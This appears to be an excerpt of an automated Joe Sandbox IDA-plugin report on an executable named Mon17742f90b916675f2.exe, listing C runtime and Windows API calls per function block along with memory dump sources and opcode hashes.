                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0085AB6D
                                        • __freea.LIBCMT ref: 0085AB7A
                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        • __freea.LIBCMT ref: 0085AB83
                                        • __freea.LIBCMT ref: 0085ABA8
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                        • String ID:
                                        • API String ID: 2597970681-0
                                        • Opcode ID: 81ca6e3147bcea6553385d8dfc1ce509862c7d0f6b49e00a54afdf0949f5cf81
                                        • Instruction ID: f994e1f963dc7878126c78150e48158131cbd020aa9f4463815b090c707f828b
                                        • Opcode Fuzzy Hash: 81ca6e3147bcea6553385d8dfc1ce509862c7d0f6b49e00a54afdf0949f5cf81
                                        • Instruction Fuzzy Hash: AE51C472600216ABDF298F68CC81EBB7BAAFB44762F154769FD04D7140EB34DC58C692
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0085BDDE,?,00000000,?,00000000,00000000), ref: 0085B6AB
                                        • __fassign.LIBCMT ref: 0085B726
                                        • __fassign.LIBCMT ref: 0085B741
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0085B767
                                        • WriteFile.KERNEL32(?,?,00000000,0085BDDE,00000000,?,?,?,?,?,?,?,?,?,0085BDDE,?), ref: 0085B786
                                        • WriteFile.KERNEL32(?,?,00000001,0085BDDE,00000000,?,?,?,?,?,?,?,?,?,0085BDDE,?), ref: 0085B7BF
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: fe72cabee2ac02f6f3372679d13c1decf437fcfc6aadfba91493e5c9d12bcb1d
                                        • Instruction ID: d3d316be392a906b5822f80a14df4c474c27464ef325860b64e0d4d470927298
                                        • Opcode Fuzzy Hash: fe72cabee2ac02f6f3372679d13c1decf437fcfc6aadfba91493e5c9d12bcb1d
                                        • Instruction Fuzzy Hash: C551E270E002099FCB10CFA8DC85AEEBBF8FF19341F14412AE951E7291E770A944CBA0
                                        APIs
                                          • Part of subcall function 00859314: _free.LIBCMT ref: 0085933D
                                        • _free.LIBCMT ref: 0085939E
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 008593A9
                                        • _free.LIBCMT ref: 008593B4
                                        • _free.LIBCMT ref: 00859408
                                        • _free.LIBCMT ref: 00859413
                                        • _free.LIBCMT ref: 0085941E
                                        • _free.LIBCMT ref: 00859429
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: de0c4abfa7c1859f01765e3500e606eec0957940f7d3b2b7b979ae10827cc60f
                                        • Instruction ID: 7fab37d5cc7038485c615539b6a0a33c36922e45740ef6b436f8a1c57edbaca4
                                        • Opcode Fuzzy Hash: de0c4abfa7c1859f01765e3500e606eec0957940f7d3b2b7b979ae10827cc60f
                                        • Instruction Fuzzy Hash: 42117231540714F6D621B7B4CC0BFCB77ACFF00741F806819FAD9E61A2E664B51C56A2
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00854D07,00853C37,00864618,00000010,008533FF,?,?,?,?,?,00000000,?), ref: 00854D1E
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00854D2C
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00854D45
                                        • SetLastError.KERNEL32(00000000,00854D07,00853C37,00864618,00000010,008533FF,?,?,?,?,?,00000000,?), ref: 00854D97
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: eb2dceab9c050048c61a744a741fb8cf604346d9cb5f1729545bfc672483288b
                                        • Instruction ID: 86481e731640b9394a4fe6082fbbe670579aedc0556e7802cb48a5600055d5dc
                                        • Opcode Fuzzy Hash: eb2dceab9c050048c61a744a741fb8cf604346d9cb5f1729545bfc672483288b
                                        • Instruction Fuzzy Hash: B801B132249F11AEA7342BB8BC856663A69FF1177B3301339FD10E20E1FF554C585182
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00856995,00864800,0000000C,00852EF5), ref: 00856FF7
                                        • _free.LIBCMT ref: 0085702A
                                        • _free.LIBCMT ref: 00857052
                                        • SetLastError.KERNEL32(00000000), ref: 0085705F
                                        • SetLastError.KERNEL32(00000000), ref: 0085706B
                                        • _abort.LIBCMT ref: 00857071
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 9669ac8c8110c0718a6e88736b1dd74b1992ac8e9b2c56022682bec15dc228f6
                                        • Instruction ID: bb3f39e4360d931b84c1748736252e96d780572753ae2996b2799aaa677d6c5f
                                        • Opcode Fuzzy Hash: 9669ac8c8110c0718a6e88736b1dd74b1992ac8e9b2c56022682bec15dc228f6
                                        • Instruction Fuzzy Hash: DFF0A436108E1066C622733D7C0AE1A26AAFBC1777B758024FD14E32D2FE65881E5163
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00855AC7,00000003,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002), ref: 00855AF2
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00855B05
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00855AC7,00000003,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002,00000000), ref: 00855B28
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 54eda19b24b54a13d72d3769ead5c155efce944f23299e9fe66907309c08ac1f
                                        • Instruction ID: e8e1b7013985af700e03b2f12e5bc2cdfc60040edbd419ef9479ef024c74c60f
                                        • Opcode Fuzzy Hash: 54eda19b24b54a13d72d3769ead5c155efce944f23299e9fe66907309c08ac1f
                                        • Instruction Fuzzy Hash: 03F03130A10608BBCB115B54DC19B9EBFB9FB08753F440064F906E2292DF754944CA51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 2c0876a46ad195574e8931a11ad811c3a88d9b06c3ba0f88e9bb53bf62d00172
                                        • Instruction ID: 9df0fa9de840f9950d1511faa1307096d4aa25ca9dbc4994a502578014c733bf
                                        • Opcode Fuzzy Hash: 2c0876a46ad195574e8931a11ad811c3a88d9b06c3ba0f88e9bb53bf62d00172
                                        • Instruction Fuzzy Hash: F241DF32E002009FCB24DF78C881A5EB7F5FF88315B9585A9E915EB351EA31ED19CB81
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,008583CC,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00859481
                                        • __alloca_probe_16.LIBCMT ref: 008594B9
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085950A
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0085951C
                                        • __freea.LIBCMT ref: 00859525
                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 1857427562-0
                                        • Opcode ID: c73277cba7bdef47195cb849b896ebfa18339d955dbcdeaf5ed3aa36307a5b6a
                                        • Instruction ID: d1e234ace2abc7801f202f042254aa73688527a56eae5c880594f461265e0994
                                        • Opcode Fuzzy Hash: c73277cba7bdef47195cb849b896ebfa18339d955dbcdeaf5ed3aa36307a5b6a
                                        • Instruction Fuzzy Hash: 6D31B272A0020AEBDF259F68DC45DAE7BA5FB44312F040168FC04D7191E735CD69CB91
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 00858512
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00858535
                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085855B
                                        • _free.LIBCMT ref: 0085856E
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085857D
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                        • String ID:
                                        • API String ID: 2278895681-0
                                        • Opcode ID: 97432a34f527a5cc29b0f92cded2d032d4804e7fca5d80e5d773857b5e61fcba
                                        • Instruction ID: b781eea33b81c7c1f5f09495db6db434d5fe4de5b03d50d431762d5371d6613f
                                        • Opcode Fuzzy Hash: 97432a34f527a5cc29b0f92cded2d032d4804e7fca5d80e5d773857b5e61fcba
                                        • Instruction Fuzzy Hash: F701DD72901615BF6321577A5C88C7B6A6CFAC2FA3318412AFD04E3141FE648D0D41B1
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,008556B2,00856AF6,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20), ref: 0085707C
                                        • _free.LIBCMT ref: 008570B1
                                        • _free.LIBCMT ref: 008570D8
                                        • SetLastError.KERNEL32(00000000), ref: 008570E5
                                        • SetLastError.KERNEL32(00000000), ref: 008570EE
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: c4b54706ccbc91924b9f2efec79f129944d8e3bbf2e2d4190223e50bf943416b
                                        • Instruction ID: 007010046835fdf1a83098f3cc9258974a2334bd8bcd2d3cccb6f0b148cfd611
                                        • Opcode Fuzzy Hash: c4b54706ccbc91924b9f2efec79f129944d8e3bbf2e2d4190223e50bf943416b
                                        • Instruction Fuzzy Hash: 5701D136208E11A7CA2277387C45D2B26AAFBC13777258029FE14E32D2FE64881E4172
                                        APIs
                                        • _free.LIBCMT ref: 008592C3
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 008592D5
                                        • _free.LIBCMT ref: 008592E7
                                        • _free.LIBCMT ref: 008592F9
                                        • _free.LIBCMT ref: 0085930B
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 2c516ee4903098f9c014647eb11bf0e4f0c6dc71b7bea2e64187860b9c8f3da7
                                        • Instruction ID: 9fce01cb4ce1c56a0f0fac836f7da55ff7a5ddf4718a4964828361adf4a4e2b8
                                        • Opcode Fuzzy Hash: 2c516ee4903098f9c014647eb11bf0e4f0c6dc71b7bea2e64187860b9c8f3da7
                                        • Instruction Fuzzy Hash: 78F06272414250FBC620DBA8F8C2C6A73E9FB007217A5580AFC49E7660EB70FCD88661
                                        APIs
                                        • _free.LIBCMT ref: 00856639
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 0085664B
                                        • _free.LIBCMT ref: 0085665E
                                        • _free.LIBCMT ref: 0085666F
                                        • _free.LIBCMT ref: 00856680
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 7d66ed1dea3eb52bb702b4c2e63945a117bc36cb46bb02c7573782bc11d57813
                                        • Instruction ID: 533566867b587b64cb9ccd3bdaf70ef647e0d393e9c1e48c5e023748619e54f3
                                        • Opcode Fuzzy Hash: 7d66ed1dea3eb52bb702b4c2e63945a117bc36cb46bb02c7573782bc11d57813
                                        • Instruction Fuzzy Hash: 4AF01D794042A0AFCB02AF68ED424153BA0FB04735396660BF814E7375FBF109799BC5
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe,00000104), ref: 00855C0D
                                        • _free.LIBCMT ref: 00855CD8
                                        • _free.LIBCMT ref: 00855CE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe
                                        • API String ID: 2506810119-2809151018
                                        • Opcode ID: d3ae845dd182c318451d23049565eb7a268a5b5a00844e3a3a0001c188668c70
                                        • Instruction ID: 39824cfc3b8cfc5d3cbc9f2636c26d7417e6cba2d30769cb98bd1118ffce539d
                                        • Opcode Fuzzy Hash: d3ae845dd182c318451d23049565eb7a268a5b5a00844e3a3a0001c188668c70
                                        • Instruction Fuzzy Hash: 88316B71A00B58EFCB21DB99D89199EBBF8FF85711B244066FC04D7211E6B18E48CB91
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 182f0dc93ab4c9f8620a0d21306716cab9b71d96362ac84730c340edf337ad35
                                        • Instruction ID: 28a69d5f275efaead89acdc57bef287bbfa4558df4f128c97ee68dfd7adcfcbc
                                        • Opcode Fuzzy Hash: 182f0dc93ab4c9f8620a0d21306716cab9b71d96362ac84730c340edf337ad35
                                        • Instruction Fuzzy Hash: C90184B2205A157EF6211A787CC0F276B5DFB5177AB740325B921F31D1FB608C6C4161
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,008572DB,?,00000000,00000000,00000000,?,0085754C,00000006,FlsSetValue), ref: 00857366
                                        • GetLastError.KERNEL32(?,008572DB,?,00000000,00000000,00000000,?,0085754C,00000006,FlsSetValue,008604E0,008604E8,00000000,00000364,?,008570C5), ref: 00857372
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008572DB,?,00000000,00000000,00000000,?,0085754C,00000006,FlsSetValue,008604E0,008604E8,00000000), ref: 00857380
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 7b3834a7bce2597c5eb1126e9b6758eabe00a24333f999c034d217a659f095a9
                                        • Instruction ID: 7ea45706e53d412ee8ea5d7ce11e40d1c2eec833e9e69b8b3bdfb386b18a3c34
                                        • Opcode Fuzzy Hash: 7b3834a7bce2597c5eb1126e9b6758eabe00a24333f999c034d217a659f095a9
                                        • Instruction Fuzzy Hash: 0101D432209726ABC7214A68FC44A9B7B98FF447B37558620FD06D32C1D730D804D6E0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$AllocString
                                        • String ID:
                                        • API String ID: 245909816-0
                                        • Opcode ID: e59e226f6cf242f80bf347ffac5fb5cc7c90b88ea7a61753372c121039fbd285
                                        • Instruction ID: e8eb47fedb9aebef139eacd272837c1ede6dced96c20443404d53eb45a303ff8
                                        • Opcode Fuzzy Hash: e59e226f6cf242f80bf347ffac5fb5cc7c90b88ea7a61753372c121039fbd285
                                        • Instruction Fuzzy Hash: EC11D672941B55EBDB208F58C805B5ABBE8FB04B71F10822AED14E7380EBB99904C7D1
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 008533D1
                                          • Part of subcall function 00853A09: ___AdjustPointer.LIBCMT ref: 00853A53
                                        • _UnwindNestedFrames.LIBCMT ref: 008533E8
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 008533FA
                                        • CallCatchBlock.LIBVCRUNTIME ref: 0085341E
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID:
                                        • API String ID: 2633735394-0
                                        • Opcode ID: 99e7a00b3d64d747c11acfba084bd7f2c62d1f3d3bfdfe6e74b3db22714ce2ef
                                        • Instruction ID: cf8a3418aa955c5cd8828524b3edd9cf99537423481ca01ad6c3207fde6923d0
                                        • Opcode Fuzzy Hash: 99e7a00b3d64d747c11acfba084bd7f2c62d1f3d3bfdfe6e74b3db22714ce2ef
                                        • Instruction Fuzzy Hash: 34012532000108BBCF129F59DC41EDA7FBAFF58796F158114FD18A6120D772E9A5EBA1
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00854BC4
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00854BC9
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00854BCE
                                          • Part of subcall function 00854F9E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00854FAF
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00854BE3
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
